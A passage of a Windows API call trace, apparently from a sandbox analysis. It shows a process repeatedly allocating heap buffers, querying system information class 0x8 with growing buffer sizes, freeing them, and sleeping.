RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0297.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0297.384] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.384] Sleep (dwMilliseconds=0x110) [0297.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0297.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0297.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0297.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0297.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0297.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0297.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.411] Sleep (dwMilliseconds=0x110) [0297.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0297.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0297.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0297.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0297.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0297.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0297.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.426] Sleep (dwMilliseconds=0x110) [0297.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0297.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0297.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0297.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0297.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0297.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0297.445] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0297.445] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0297.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.451] Sleep (dwMilliseconds=0x110) [0297.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0297.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0297.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0297.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0297.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0297.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0297.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.475] Sleep (dwMilliseconds=0x110) [0297.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0297.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0297.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0297.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0297.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0297.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0297.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.490] Sleep (dwMilliseconds=0x110) [0297.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0297.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0297.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0297.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0297.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0297.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0297.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0297.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0297.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.526] Sleep (dwMilliseconds=0x110) [0297.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0297.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0297.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0297.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0297.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0297.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0297.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.536] Sleep (dwMilliseconds=0x110) [0297.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0297.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0297.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0297.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0297.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0297.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0297.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0297.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0297.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.552] Sleep (dwMilliseconds=0x110) [0297.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0297.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0297.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0297.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0297.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.566] Sleep (dwMilliseconds=0x110) [0297.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0297.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0297.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0297.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0297.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0297.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0297.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0297.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0297.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.585] Sleep (dwMilliseconds=0x110) [0297.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0297.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0297.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0297.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0297.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.608] Sleep (dwMilliseconds=0x110) [0297.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0297.634] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0297.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0297.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0297.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0297.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0297.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0297.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0297.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.644] Sleep (dwMilliseconds=0x110) [0297.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0297.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0297.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0297.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0297.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0297.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0297.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0297.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0297.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.673] Sleep (dwMilliseconds=0x110) [0297.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0297.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0297.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0297.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: 